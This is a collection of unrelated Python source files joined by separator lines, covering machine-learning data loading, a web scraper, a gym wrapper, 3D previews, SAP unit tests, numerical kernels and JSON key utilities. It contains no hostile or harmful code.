if USE_IMAGES:
fold_data.append(Datum(
hints[i], examples[i, ...], inputs[i, ...], labels[i]))
else:
fold_data.append(Datum(
hints[i], ex_features[i, ...], inp_features[i, ...], labels[i]))
if FLAGS.vis:
# TODO this is so dirty!
datum = fold_data[-1]
fold_data[-1] = VisDatum(
datum.hint, datum.ex_inputs, datum.input,
datum.label, examples[i, ...], inputs[i, ...])
data[fold] = fold_data
self.train_data = data["train"]
self.val_data = data["val"]
self.test_data = data["test"]
self.val_same_data = data["val_same"]
self.test_same_data = data["test_same"]
#self.train_data = data["train"][:8000]
#self.val_data = data["train"][8000:8500]
#self.test_data = data["train"][8500:9000]
if USE_IMAGES:
self.width, self.height, self.channels = self.train_data[0].input.shape
else:
#self.n_features = len(self.feature_index)
self.n_features = inp_features.shape[1]
def sample_train(self, n_batch, augment):
n_train = len(self.train_data)
batch = []
#for _ in range(n_batch):
# datum = self.train_data[random.randint(n_train)]
# batch.append(datum)
for _ in range(n_batch):
datum = self.train_data[random.randint(n_train)]
if not augment:
batch.append(datum)
continue
label = random.randint(2)
if label == 0:
alt_datum = self.train_data[random.randint(n_train)]
swap = random.randint(N_EX + 1)
if swap == N_EX:
feats = alt_datum.input
else:
feats = alt_datum.ex_inputs[swap, ...]
datum = datum._replace(input=feats, label=0)
elif label == 1:
swap = random.randint((N_EX + 1 if datum.label == 1 else N_EX))
if swap != N_EX:
examples = datum.ex_inputs.copy()
feats = examples[swap, ...]
if datum.label == 1:
examples[swap, ...] = datum.input
else:
examples[swap, ...] = examples[random.randint(N_EX), ...]
datum = datum._replace(input=feats, ex_inputs=examples, label=1)
batch.append(datum)
#if datum.label == 0:
# batch.append(datum)
# continue
#swap = random.randint(N_EX + 1)
#if swap == N_EX:
# batch.append(datum)
# continue
#examples = datum.ex_inputs.copy()
#tmp = examples[swap, ...]
#examples[swap, ...] = datum.input
#datum = datum._replace(ex_inputs=examples, input=tmp)
#batch.append(datum)
#for _ in range(n_batch):
# datum = self.train_data[random.randint(n_train)]
# in_examples = datum.ex_inputs
# out_examples = []
# #for i_ex in range(N_EX):
# # out_examples.append(
# # in_examples[random.randint(in_examples.shape[0]), ...])
# indices = list(range(in_examples.shape[0]))
# random.shuffle(indices)
# indices = indices[:N_EX]
# out_examples = [in_examples[i, ...] for i in indices]
# #out_examples = in_examples[:N_EX, ...]
# datum = datum._replace(ex_inputs=np.asarray(out_examples))
# batch.append(datum)
return batch
def sample_val(self, same=False):
if same:
return self.val_same_data
else:
return self.val_data
def sample_test(self, same=False):
if same:
return self.test_same_data
else:
return self.test_data
def visualize(self, datum, hyp, pred, dest):
hint = " ".join(self.hint_vocab.get(w) for w in datum.hint[1:-1])
hyp = " ".join(self.hint_vocab.get(w) for w in hyp[1:-1])
os.mkdir(dest)
with open(os.path.join(dest, "desc.txt"), "w") as desc_f:
print >>desc_f, "gold desc:", hint
print >>desc_f, "pred desc:", hyp
print >>desc_f, "gold label:", bool(datum.label)
print >>desc_f, "pred label:", bool(pred)
for i in range(datum.ex_inputs.shape[0]):
scipy.misc.imsave(
os.path.join(dest, "ex_%d.png" % i),
datum.vis_ex_inputs[i, ...])
scipy.misc.imsave(
os.path.join(dest, "input.png"),
datum.vis_input)
|
"""
created by ldolin
"""
import sys
import scrapy
from scrapy_demo.tutorial.tutorial.items import MaoyanreyingItem
# sys.path.append('..')
# from items import MaoyanreyingItem
class MaoyanSpider(scrapy.Spider):
name = 'maoyan'
allowed_domains = ['maoyan.com']
start_urls = ['http://maoyan.com/board/7/']
def parse(self, response):
d1 = response.css('.board-wrapper dd')
for dd in d1:
item = MaoyanreyingItem()
item['index'] = dd.css('.board-index::text').extract_first()
item['index'] = dd.css('.name::text').extract_first()
item['index'] = dd.css('.star::text').extract_first()
item['index'] = dd.css('.releaset::text').extract_first()
item['index'] = dd.css('.integer::text').extract_first()+dd.css('.fracttion::text').extract__first()
yield item
|
import cv2
import gym
import numpy as np
class MixedGrayscaleColorFrameStack(gym.ObservationWrapper):
"""Stacks the latest frame as color and previous frames as grayscale."""
def __init__(self, env, num_prev_frames=1):
super().__init__(env)
self.num_prev_frames = num_prev_frames
w, h, c = env.observation_space.shape
# This stores the frames in grayscale (we only need to store frames in grayscale not color).
self.grayscale_frames = np.zeros((w, h, self.num_prev_frames), dtype=np.uint8)
# Number of channels is (channels for latest in color) + (number of previous frames).
observation_shape = (w, h, c + num_prev_frames)
low = np.zeros(observation_shape, dtype=np.uint8)
high = np.ones(observation_shape, dtype=np.uint8) * 255
self.observation_space = gym.spaces.Box(low=low, high=high, dtype=np.uint8)
def _insert_observation(self, observation):
self.grayscale_frames = np.roll(self.grayscale_frames, shift=-1, axis=-1)
self.grayscale_frames[:, :, -1] = cv2.cvtColor(observation, cv2.COLOR_RGB2GRAY)
def _format_obseration(self, observation):
return np.concatenate((self.grayscale_frames, observation), axis=-1)
def observation(self, observation):
observation_to_return = self._format_obseration(observation)
self._insert_observation(observation)
return observation_to_return
def reset(self):
self.grayscale_frames.fill(0)
return super().reset()
def plot(self, obs, filepath):
import matplotlib.pyplot as plt
fig, axs = plt.subplots(1, self.num_prev_frames + 1, figsize=(12, 6))
axs[0].imshow(obs[:, :, -3:])
for i in range(1, self.num_prev_frames + 1):
axs[i].imshow(obs[:, :, i - 1])
plt.savefig(filepath)
plt.close()
if __name__ == "__main__":
import sys
env = gym.make("procgen:procgen-plunder-v0")
env = MixedGrayscaleColorFrameStack(env, num_prev_frames=2)
x = env.reset()
env.plot(x, f"/home/wulfebw/Desktop/scratch/test_0.png")
for i in range(1, 500):
sys.stdout.write(f"\r{i}")
x, _, done, _ = env.step(env.action_space.sample())
env.plot(x, f"/home/wulfebw/Desktop/scratch/test_{i}.png")
|
# -*- coding: utf-8 -*-
import tempfile
import typing
from preview_generator.exception import BuilderDependencyNotFound
from preview_generator.exception import UnsupportedMimeType
from preview_generator.extension import mimetypes_storage
from preview_generator.preview.builder.image__pillow import ImagePreviewBuilderPillow # nopep8
from preview_generator.preview.generic_preview import PreviewBuilder
from preview_generator.utils import ImgDims
from preview_generator.utils import MimetypeMapping
# HACK - G.M - 2019-11-05 - Hack to allow load of module without vtk installed
vtk_installed = True
try:
from vtk import vtkActor
from vtk import vtkNamedColors
from vtk import vtkPNGWriter
from vtk import vtkPolyDataMapper
from vtk import vtkRenderWindow
from vtk import vtkRenderer
from vtk import vtkSTLReader
from vtk import vtkVersion
from vtk import vtkWindowToImageFilter
from vtk.vtkIOKitPython import vtkAbstractPolyDataReader
from vtk.vtkIOKitPython import vtkOBJReader
from vtk.vtkIOKitPython import vtkPLYReader
except ImportError:
vtk_installed = False
class ImagePreviewBuilderVtk(PreviewBuilder):
PLY_MIMETYPES_MAPPING = [MimetypeMapping("application/ply", ".ply")]
OBJ_MIMETYPES_MAPPING = [
MimetypeMapping("application/wobj", ".obj"),
MimetypeMapping("application/object", ".obj"),
MimetypeMapping("model/obj", ".obj"),
]
STL_MIMETYPES_MAPPING = [
MimetypeMapping("application/sla", ".stl"),
MimetypeMapping("application/vnd.ms-pki.stl", ".stl"),
MimetypeMapping("application/x-navistyle", ".stl"),
MimetypeMapping("model/stl", ".stl"),
]
@classmethod
def get_label(cls) -> str:
return "Images generator from 3d file - based on Vtk"
@classmethod
def get_supported_mimetypes(cls) -> typing.List[str]:
mimetypes = []
for mimetype_mapping in cls.get_mimetypes_mapping():
mimetypes.append(mimetype_mapping.mimetype)
return mimetypes
@classmethod
def get_mimetypes_mapping(cls) -> typing.List[MimetypeMapping]:
return cls.STL_MIMETYPES_MAPPING + cls.OBJ_MIMETYPES_MAPPING + cls.PLY_MIMETYPES_MAPPING
@classmethod
def check_dependencies(cls) -> None:
if not vtk_installed:
raise BuilderDependencyNotFound("this builder requires vtk to be available")
@classmethod
def dependencies_versions(cls) -> typing.Optional[str]:
vtk_version = vtkVersion()
return "VTK version :{}".format(vtk_version.GetVTKVersion())
@classmethod
def _get_vtk_reader(cls, mimetype: str) -> "vtkAbstractPolyDataReader":
if mimetype in [mapping.mimetype for mapping in cls.STL_MIMETYPES_MAPPING]:
return vtkSTLReader()
elif mimetype in [mapping.mimetype for mapping in cls.OBJ_MIMETYPES_MAPPING]:
return vtkOBJReader()
elif mimetype in [mapping.mimetype for mapping in cls.PLY_MIMETYPES_MAPPING]:
return vtkPLYReader()
else:
raise UnsupportedMimeType("Unsupported mimetype: {}".format(mimetype))
def build_jpeg_preview(
self,
file_path: str,
preview_name: str,
cache_path: str,
page_id: int,
extension: str = ".jpg",
size: ImgDims = None,
mimetype: str = "",
) -> None:
if not size:
size = self.default_size
colors = vtkNamedColors()
if not mimetype:
guessed_mimetype, _ = mimetypes_storage.guess_type(file_path, strict=False)
# INFO - G.M - 2019-11-22 - guessed_mimetype can be None
mimetype = guessed_mimetype or ""
reader = self._get_vtk_reader(mimetype)
reader.SetFileName(file_path)
mapper = vtkPolyDataMapper()
mapper.SetInputConnection(reader.GetOutputPort())
actor = vtkActor()
actor.SetMapper(mapper)
rotation = (-70, 0, 45)
R_x, R_y, R_z = rotation # TODO set a good looking default orientation
actor.RotateX(R_x)
actor.RotateY(R_y)
actor.RotateZ(R_z)
# Create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.OffScreenRenderingOn()
renWin.AddRenderer(ren)
renWin.SetSize(size.width, size.height)
ren.SetBackground(colors.GetColor3d("white"))
# Assign actor to the renderer
ren.AddActor(actor)
renWin.Render()
# Write image
windowto_image_filter = vtkWindowToImageFilter()
windowto_image_filter.SetInput(renWin)
# windowto_image_filter.SetScale(scale) # image scale
windowto_image_filter.SetInputBufferTypeToRGBA()
with tempfile.NamedTemporaryFile(
"w+b", prefix="preview-generator-", suffix=".png"
) as tmp_png:
writer = vtkPNGWriter()
writer.SetFileName(tmp_png.name)
writer.SetInputConnection(windowto_image_filter.GetOutputPort())
writer.Write()
return ImagePreviewBuilderPillow().build_jpeg_preview(
tmp_png.name, preview_name, cache_path, page_id, extension, size, mimetype
)
def has_jpeg_preview(self) -> bool:
return True
def get_page_number(
self, file_path: str, preview_name: str, cache_path: str, mimetype: str = ""
) -> int:
return 1
|
"""
Dubins Rejoin Agent Plant
dubinplant.py
Taken from
> Umberto Ravaioli, James Cunningham, John McCarroll, Vardaan Gangal, Kerianne Hobbs,
> "Safe Reinforcement Learning Benchmark Environments for Aerospace Control Systems,"
> IEEE Aerospace, Big Sky, MT, March 2022.
"""
import numpy as np
def model_output(model, time_t, state_air, input_forces):
return []
def model_state_update(model, time_t, state_air, input_rate):
input_rate = input_rate[model.idx]
xdot = np.zeros((3,))
xdot[0] = model.v * np.cos(state_air[-1])
xdot[1] = model.v * np.sin(state_air[-1])
xdot[2] = input_rate
return xdot
|
#!/usr/bin/env python
from __future__ import print_function
import sys
if __name__ == '__main__':
if len(sys.argv) == 1:
print("Usage: {} <bitboard>".format(sys.argv[0]))
sys.exit(0)
bbrd = int(sys.argv[1])
print(bbrd)
sys.stdout.write('+---+---+---+---+---+---+---+---+\n')
for rank in reversed(range(0, 8)):
for file in range(8):
sq = rank * 8 + file
pc = '*' if (bbrd & (1 << sq)) else ' '
sys.stdout.write('| {} '.format(pc))
sys.stdout.write('|\n+---+---+---+---+---+---+---+---+\n')
|
import firebase_admin
from firebase_admin import db
from firebase_admin import credentials
import json
import math
import random
from time import sleep as s
from time import time as t
cred = credentials.Certificate("serviceAccount.json")
fb = firebase_admin.initialize_app(cred, options={
"databaseURL": "https://sustaingineering-horus.firebaseio.com"
})
i = 0
sensors = ["123456", "69420", "1"]
while True:
time = t()
shape = {
"power": random.randrange(200, 600),
"surface-temperature": random.randrange(10, 30),
"op-temp": random.randrange(10, 30),
"current": math.sin(i),
"water-breaker": random.randrange(0, 3),
"time-stamp": int(time),
"voltage": math.cos(i)
}
i += 0.1
for sensor in sensors:
# Update or set is the same here, since we're accessing a child that's unique already
db.reference(path=sensor).child(str(int(time))).set(shape)
s(2)
|
from homeassistant.const import TEMP_CELSIUS
def field_mask(str_value, from_start=0, from_end=0):
str_mask = "x" * (len(str_value) - from_start - from_end)
return f"{str_value[:from_start]}{str_mask}{str_value[-from_end:]}"
def convert_temp_value(temp_unit, service_code, target_value):
"""Convert from C/F to 31-57 needed for service call"""
# Handle setting car units (prior to version 2.0)
if target_value >= 31 and target_value <= 57:
return target_value
# Engine start/set rcc value
if service_code == "REON":
# Get temp units
if temp_unit == TEMP_CELSIUS:
# Convert from C
return min(57, max(31, int(target_value * 2)))
else:
# Convert from F
return min(57, max(31, target_value - 27))
# Climate preconditioning
if service_code == "ECC":
if temp_unit == TEMP_CELSIUS:
return min(285, max(155, int(target_value * 10)))
else:
# Convert from F
return min(285, max(155, int(((target_value - 27) / 2) * 10)))
|
import json
from collections import OrderedDict
with open("pop_fandoms.json", "r") as f:
temp_list = json.load(f)
mem = []
final = []
for record in temp_list:
url = record["fandom_link"]
if url not in mem:
mem.append(url)
final.append({"fandom": record["fandom"], "fandom_link": record["fandom_link"]})
with open("pop_fandoms_clean.json", "w") as f:
json.dump(final, f, indent = 6)
|
# Usage::
#
# {{thumbnail:.files/img/favicon.png 200x100 exact_size}}
#
# where width = 200 & height = 100
#
# By default, the macro preserves the aspect ratio of the image. If you set 'exact_size', then the generated thumbnail
# will be of the same passed size exactly. 'exact_size' is optional
import os
DEFAULT_THUMB_SIZE = '150x100'
def main(j, args, params, tags, tasklet):
page = args.page
try:
import Image
except ImportError:
# pyflakes.ignore
from PIL import Image
space_name = args.doc.getSpaceName()
space_path = j.portal.tools.server.active.getSpace(space_name).model.path
macro_params = args.cmdstr.split(' ')
img_url = macro_params[0]
if len(macro_params) >= 2:
thumb_size = macro_params[1]
else:
thumb_size = args.doc.docparams.get('thumb_size', DEFAULT_THUMB_SIZE)
if len(macro_params) >= 3:
exact_size = macro_params[2]
else:
exact_size = False
thumb_size = thumb_size or args.doc.docparams.get('thumb_size', DEFAULT_THUMB_SIZE)
width, height = [int(x) for x in thumb_size.split('x')]
img_path = img_url.strip('/')
full_img_path = os.path.join(space_path, img_path)
# Add 's_' to file name to tell that this is a thumbnail, and add width & height too
thumbnail_path = ('{0}s_{1}x{2}_').format(os.path.sep, width, height).join(os.path.split(full_img_path))
img_url_base, img_name = os.path.split(img_url)
thumbnail_url = os.path.join(space_name, img_url_base.strip('/'), r's_{0}x{1}_{2}'.format(width, height, img_name))
# If the thumbnail doesn't exist on the desk, generate it
if not os.path.exists(thumbnail_path):
im = Image.open(full_img_path)
if exact_size:
im = im.resize((width, height), Image.ANTIALIAS)
else:
im.thumbnail((width, height), Image.ANTIALIAS)
im.save(thumbnail_path)
page.addMessage('<img src="/{0}" />'.format(thumbnail_url))
params.result = page
return params
def match(j, args, params, tags, tasklet):
return True
|
tags = list()
ticks = list()
urls = list()
#Contain specific info for each video
#CREATOR, VIEWS, TAGS, DATE PUBLISHED
video_info = list()
YOUTUBE = "https://www.youtube.com"
STARTING = "https://www.youtube.com/watch?v=fzQ6gRAEoy0"
|
from private.http import Http
from private.cookie import Cookie
class Profile:
def __init__(self):
self.Cookie = Cookie()
self.Http = Http()
def IsAuthorized(self):
if not self.Cookie.GetCookie("Auth"):
print("not logged in")
self.Http.Redirect(303, '/signin')
return False
else:
return True
|
import argparse
import torch
from bitpack.pytorch_interface import load_quantized_state_dict
parser = argparse.ArgumentParser(description='To unpack models that are packed by BitPack')
parser.add_argument('--device',
type=int,
default=-1,
help='index of target device, -1 means cpu')
parser.add_argument('--input-packed-file',
type=str,
default=None,
help='path to packed file')
parser.add_argument('--original-int-file',
type=str,
default=None,
help='original quantized file in integer format, this is for correctness check')
args = parser.parse_args()
if args.device == -1:
target_device = torch.device('cpu')
else:
target_device = torch.device('cuda:' + str(args.device))
unpacked_state_dict = load_quantized_state_dict(args.input_packed_file, target_device)
if args.original_int_file:
original_state_dict = torch.load(args.original_int_file)['weight_integer']
for k in original_state_dict.keys():
if not torch.all(unpacked_state_dict[k].type_as(original_state_dict[k])==original_state_dict[k]):
print("Error Detected between Unpacked Tensor and Original Tensor with Key Value: ", k)
print("Unpacked Tensor: ", unpacked_state_dict[k])
print("Original Tensor: ", original_state_dict[k])
break
else:
print("Correctly Match: ", k)
|
#!/usr/bin/env python3
import unittest
from unittest.mock import Mock
from sap.rfc.bapi import (
bapi_message_to_str,
BAPIReturn,
BAPIError
)
def create_bapiret(typ:str=None, message:str=None, msg_class:str=None, msg_number:str=None):
return {'TYPE': typ, 'ID': msg_class, 'NUMBER': msg_number, 'MESSAGE': message}
def create_bapiret_error(message:str):
return create_bapiret(typ='E', message=message, msg_class='ERR', msg_number='333')
def create_bapiret_warning(message:str):
return create_bapiret(typ='W', message=message, msg_class='WRN', msg_number='777')
def create_bapiret_info(message:str):
return create_bapiret(typ='S', message=message, msg_class='NFO', msg_number='555')
class TestMesageToStr(unittest.TestCase):
def getBAPIMessage(self, **kwargs):
bapiret = {
'ID': '',
'TYPE': '',
'NUMBER': '',
'MESSAGE': 'message',
}
bapiret.update(kwargs)
return bapi_message_to_str(bapiret)
def test_short_error(self):
self.assertEqual('Error: message', self.getBAPIMessage(TYPE='E'))
def test_short_warning(self):
self.assertEqual('Warning: message', self.getBAPIMessage(TYPE='W'))
def test_short_info(self):
self.assertEqual('Info: message', self.getBAPIMessage(TYPE='I'))
def test_short_success(self):
self.assertEqual('Success: message', self.getBAPIMessage(TYPE='S'))
def test_short_abort(self):
self.assertEqual('Abort: message', self.getBAPIMessage(TYPE='A'))
def test_wh_id_and_wh_no(self):
self.assertEqual('Success(SCS|737): message', self.getBAPIMessage(TYPE='S', ID='SCS', NUMBER='737'))
def test_wo_id_and_wh_no(self):
self.assertEqual('Success(|737): message', self.getBAPIMessage(TYPE='S', ID='', NUMBER='737'))
def test_wh_id_and_wo_no(self):
self.assertEqual('Success(SCS|): message', self.getBAPIMessage(TYPE='S', ID='SCS', NUMBER=''))
def test_wh_id_and_wh_no_000(self):
self.assertEqual('Success(SCS|000): message', self.getBAPIMessage(TYPE='S', ID='SCS', NUMBER='000'))
def test_wo_id_and_wh_no_000(self):
self.assertEqual('Success: message', self.getBAPIMessage(TYPE='S', ID='', NUMBER='000'))
class TestBAPIReturn(unittest.TestCase):
def setUp(self):
self.message_e = 'Error message'
self.message_w = 'Warning message'
self.bapirettab = [create_bapiret_error(self.message_e), create_bapiret_warning(self.message_w)]
self.response = Mock()
def test_ctor_value_error(self):
with self.assertRaises(ValueError) as caught:
BAPIReturn("wrong type")
self.assertEqual(str(caught.exception), "Neither dict nor list BAPI return type: str")
def test_is_empty(self):
self.assertTrue(BAPIReturn([]).is_empty)
def test_not_is_empty(self):
self.assertFalse(BAPIReturn(self.bapirettab).is_empty)
def test_is_error_no_error(self):
self.assertFalse(BAPIReturn(self.bapirettab[1]).is_error)
def test_is_error_with_error(self):
self.assertTrue(BAPIReturn(self.bapirettab).is_error)
def test_error_message_no_error(self):
self.assertIsNone(BAPIReturn(self.bapirettab[1]).error_message)
def test_error_message_with_error(self):
self.assertEqual(BAPIReturn(self.bapirettab).error_message, 'Error(ERR|333): Error message')
def test_message_lines(self):
self.assertEqual(BAPIReturn(self.bapirettab).message_lines(), ['Error(ERR|333): Error message', 'Warning(WRN|777): Warning message'])
class TestBAPIError(unittest.TestCase):
def setUp(self):
self.message_e = 'Error message'
self.message_w = 'Warning message'
self.bapirettab = [create_bapiret_error(self.message_e), create_bapiret_warning(self.message_w)]
self.bapiret = BAPIReturn(self.bapirettab)
self.response = Mock()
def assertExDataMatch(self, ex):
self.assertEqual(str(ex), '''Error(ERR|333): Error message
Warning(WRN|777): Warning message''')
self.assertEqual(ex.bapiret._bapirettab, self.bapirettab)
self.assertEqual(ex.response, self.response)
def test_ctor_join_list(self):
ex = BAPIError(self.bapiret, self.response)
self.assertExDataMatch(ex)
def test_raises_for_error(self):
with self.assertRaises(BAPIError) as caught:
BAPIError.raise_for_error(self.bapirettab, self.response)
self.assertExDataMatch(caught.exception)
def test_raises_for_error_with_instance(self):
with self.assertRaises(BAPIError) as caught:
BAPIError.raise_for_error(self.bapirettab[0], self.response)
self.assertEqual(caught.exception.bapiret._bapirettab, self.bapiret[0:1])
def test_does_not_raise(self):
BAPIError.raise_for_error([create_bapiret_warning(self.message_w)], self.response)
def test_contains(self):
ex = BAPIError(self.bapiret, self.response)
self.assertTrue(ex.bapiret.contains('ERR', '333'))
self.assertFalse(ex.bapiret.contains('NOP', '222'))
|
import numpy as np
import numexpr as ne
import numba
from ..misc.numba_special_functions import numba_k0, _numba_k0#, numba_k0_inplace
def generate_modified_helmholtz_functions(k):
@numba.njit("f8(f8,f8,f8,f8)")
def modified_helmholtz_eval(sx, sy, tx, ty):
return _numba_k0(k*np.sqrt((tx-sx)**2 + (ty-sy)**2))
@numba.njit("(f8[:],f8[:],f8[:],f8[:],f8,f8,f8[:],f8[:])",parallel=True)
def modified_helmholtz_kernel(sx, sy, tx, ty, shiftx, shifty, charge, pot):
ns = sx.shape[0]
nt = tx.shape[0]
for i in numba.prange(nt):
for j in range(ns):
dx = tx[i] + shiftx - sx[j]
dy = ty[i] + shifty - sy[j]
d = np.sqrt(dx**2 + dy**2)
pot[i] += charge[j]*_numba_k0(k*d)
@numba.njit("(f8[:],f8[:],f8[:],f8[:])",parallel=True)
def modified_helmholtz_kernel_self(sx, sy, charge, pot):
ns = sx.shape[0]
scale = -0.25/np.pi
for i in numba.prange(ns):
temp = np.zeros(ns)
for j in range(ns):
if i != j:
dx = sx[i] - sx[j]
dy = sy[i] - sy[j]
d = np.sqrt(dx**2 + dy**2)
pot[i] += charge[j]*_numba_k0(k*d)
@numba.njit("(f8[:],f8[:],f8[:],f8[:],f8,f8,f8[:],f8[:])")
def modified_helmholtz_kernel_serial(sx, sy, tx, ty, shiftx, shifty, charge, pot):
ns = sx.shape[0]
nt = tx.shape[0]
for i in range(nt):
for j in range(ns):
dx = tx[i] + shiftx - sx[j]
dy = ty[i] + shifty - sy[j]
d = np.sqrt(dx**2 + dy**2)
pot[i] += charge[j]*_numba_k0(k*d)
@numba.njit("(f8[:],f8[:],f8[:],f8[:])")
def modified_helmholtz_kernel_self_serial(sx, sy, charge, pot):
ns = sx.shape[0]
scale = -0.25/np.pi
for i in range(ns):
temp = np.zeros(ns)
for j in range(ns):
if i != j:
dx = sx[i] - sx[j]
dy = sy[i] - sy[j]
d = np.sqrt(dx**2 + dy**2)
pot[i] += charge[j]*_numba_k0(k*d)
def Modified_Helmholtz_Kernel_Form(sx, sy, tx=None, ty=None, out=None):
kk = k
is_self = tx is None or ty is None
if is_self:
tx = sx
ty = sy
ns = sx.shape[0]
nt = tx.shape[0]
txt = tx[:,None]
tyt = ty[:,None]
if out is None:
out = np.zeros([nt, ns], dtype=float)
out = ne.evaluate('kk*sqrt((txt - sx)**2 + (tyt - sy)**2)')
out = numba_k0(out)
# numba_k0_inplace(out, 0)
if is_self:
np.fill_diagonal(out, 0.0)
return out
return Modified_Helmholtz_Kernel_Form, modified_helmholtz_kernel_serial, modified_helmholtz_kernel_self_serial, modified_helmholtz_eval
|
"""JSON Keys core functions.
JSON Key definition:
An ordered sequence of one or more JSON pointer reference tokens
(Object member key or array index) starting with a root-level
key/index and ending with a reference to some value within the
document.
The last key can optionally be Python slice syntax, where # can
zero, a positive or negative integer:
':', '#:', ':#', '#:#', '::#', '#::#', ':#:#' or '#:#:#'
Keys are joined together by dot characters.
Examples:
name
name.last
names.0.name.last
names.2:5
"""
from copy import deepcopy
from functools import reduce
from operator import getitem
import click
from . import exceptions as exc
from .inspector import inspect_json, count_arrays
from .sequencer import Items
from .tokenizer import SLICE_RE, parse_defaults, parse_keystr
from .treecrawler import find_keys
def get_rootkey(d, *keys):
"""Set the root level of the JSON document.
Purpose:
1. Point to an array of objects within the JSON document so that
get, del and friends will operate on the properties for each
item in the JSON array.
2. Extract a single branch or value from a JSON document.
Args:
d (Mapping or Sequence): JSON encodable data (document.)
*keys (str): JSON Keys (name, index or trailing slice.)
Returns:
The value referenced by *keys.
Raises:
KeyNotFound
IndexError
TypeError
Example:
>>> d = {'results': {'rows': [{}, {}]}}
>>> get_rootkey(d, 'results', 'rows')
[{}, {}]
"""
try:
return select_key(d, *keys)
except KeyError as e:
raise exc.KeyNotFound(e, op='rootkey', data=d, keylist=[keys])
except IndexError as e:
raise exc.IndexOutOfRange(e, op='rootkey', data=d, keylist=[keys])
except TypeError as e:
raise exc.KeyTypeError(e, op='rootkey', data=d, keylist=[keys])
def list_keys(d, fullscan=False, fg_nums='yellow'):
"""Generate numbered, sorted list of keys found in JSON document.
Purpose:
1. Show available JSON keys.
2. Show key #'s for JSON Keys; used as a shorthand for names.
Using key numbers makes JSON Cut feel more like the way the
*nix cut command works for tabular data.
List crawls through keys looking for new key names. It does not
crawl through Sequences (JSON arrays); with the exception of an
array located at the root-level of the document.
Args:
d (Mapping or Sequence): JSON encodable data (document)
fullscan (bool): traverse all keys looking for new ones;
default is to skip over previously visited key pointers.
fg_nums (str): a 'click' supported foreground color name used
to highlight the numbers and create a visual separation
between numbers and values (the values will be white.)
Supported color names: red, green, yellow, blue, magenta,
cyan, white.
Returns:
List[str]: sorted, numbered list of JSON keys found in document.
See also:
treecrawler module
Examples:
>>> d = [{'k1': {'k2': []}, 'k3': None}, {'k1': {'k4': []}}]
>>> for key in list_keys(d):
... click.echo(key, color=None)
1 k1
2 k1.k2
3 k3
Note: In the above example fullscan=False, 'k1.k4' does not show
up that is because the key selector 'k1' has already been
visited when it evalutes the 2nd item in the array, so it skips
crawling through the child nodes in this 2nd instance.
>>> for key in list_keys(d, fullscan=True):
... click.echo(key, color=None)
1 k1
2 k1.k2
3 k1.k4
4 k3
Note: When fullscan=True the function will crawl through all
JSON objects looking for any new keys; even if the same full key
selector name has been previosuly visited.
>>> d = {'k1': {'k2': [{'k3': None}]}, 'k4': 5}
>>> for key in list_keys(d, fullscan=True):
... click.echo(key, color=None)
1 k1
2 k1.k2
3 k4
The reason is that it that --list option enumerates items so
that they can be used as
a quick way of specifying JSON selectors from the command-line;
supporting
enumerated keys nested inside of nested indexes adds unnecesary
complexity, and at least to this point there haven't been any
real-world use cases to justify the need for such as feature.
Note: You can still crawl through nested keys in nested indexes
and view them using --inspect, you can also access them
explicitly
using key names & indexes, you just can't treat the results as
numbered shortcuts as you do with --list for specifying key
paths in the command-line.
"""
keys = find_keys(d, fullscan)
padding = len(str(len(keys)))
numbers = (str(i).rjust(padding) for i in range(1, len(keys) + 1))
numbers = (click.style(i, fg=fg_nums) for i in numbers)
return (n + ' ' + i for n, i in zip(numbers, keys))
def get_item(d, key):
"""Try to get item using the key, if fails try as an index or slice.
Args:
d (Mapping or Sequence): JSON encodable data (document)
key (str): JSON Keys.
Returns:
The key's value retrieved from the provided data (document)
Raises:
KeyError
IndexError
TypeError
Examples:
>>> get_item({'0': 'a key'}, '0')
'a key'
>>> get_item(['an index'], '0')
'an index'
"""
try:
return getitem(d, key)
except TypeError:
if key.isdigit():
return getitem(d, int(key))
if SLICE_RE.match(key):
if ':' not in key:
return d[int(key)]
return d[slice(*(int(i) if i else None for i in key.split(':')))]
raise
def select_key(d, *keys, default=None, no_default=False):
"""Get a nested value in a Mapping given the list of keys.
Args:
d (Mapping or Sequence): JSON encodable data (document)
*keys (str): JSON Keys (name, index or trailing slice)
default: Default value if key or index is not found.
no_default (bool): If True, raise KeyNotFound when the key is
not found or the index is out of range otherwise it uses
the 'default' value.
Returns:
The value in the document pointed to by the JSON keys.
Raises:
KeyNotFound: Only returned if no_default option is set.
KeyTypeError: When trying to use a key on a Sequence
or an index on a Mapping.
IndexOutOfRange: When trying to use an index number that
greater than the length of the Sequence.
Examples:
>>> d = {'k1': {'k2': 'Found Key/Value'}}
>>> select_key(d, 'k1', 'k2')
'Found Key/Value'
>>> print(select_key(d, 'k1', 'missing key')
None
If no_default is True it will raise a KeyNotFound error.
>>> select_key(d, 'k1', 'missing key', default='Default Value')
'Default Value'
>>> d = {'k1': [{'k2': 'Found Index/Value'}]}
>>> select_key(d, 'k1', '0', 'k2')
'Found Index/Value Value'
"""
try:
return reduce(get_item, keys, d)
except KeyError as e:
if no_default:
raise exc.KeyNotFound(e)
return default
except IndexError as e:
raise exc.IndexOutOfRange(e)
except TypeError as e:
raise exc.KeyTypeError(e)
def into_key(*keys, fullpath=False):
"""Generate target key name for the data.
Args:
*keys (str): JSON Keys (name, index or trailing slice)
fullpath (bool): Use the full JSON Key path for the target name.
Returns:
str: Key name to store the data in.
Examples:
>>> into_key(['k1', 'k2'])
'k2'
>>> into_key(['k1', 'k2'], fullpath=True)
'k1.k2'
"""
return '.'.join(keys) if fullpath else keys[-1]
def get_items(d, *keylists, fullpath=False, any=True, n=0):
"""Get multiple nested items from a dict given the keys.
Args:
d (Mapping or Sequence): JSON encodable data (document)
*keylists List[str]: JSON Keys (name, index or trailing slice)
fullpath (bool): Use the full JSON Key path in the target name.
any (bool): If True get any instance of the JSON Key value that
exists; otherwise raise KeyNotFound if the key is missing.
n (int): Data item number being processed; shown to user in
exception handling.
Returns:
dict: All Key/Values in data referenced by JSON Keys
Raises:
KeyNotFound: Only returned if 'any' option is not set.
KeyTypeError: When trying to use a key on a Sequence
or an index on a Mapping.
IndexOutOfRange: Only returned if 'any' option is not set.
Examples:
>>> d = {'k1': {'k2': 'item1'}, 'k3': 'item2'}
>>> get_items(d, ['k1', 'k2'], ['k3'])
{'k2': 'item1', 'k3': 'item2'}
>>> get_items(d, ['k1', 'k2'], ['k3'], fullpath=True)
{'k1.k2': 'item1', 'k3': 'item2'}
"""
result = {}
for keylist in keylists:
try:
into = into_key(*keylist, fullpath=fullpath)
result[into] = select_key(d, *keylist, no_default=True)
except exc.KeyNotFound as e:
if not any:
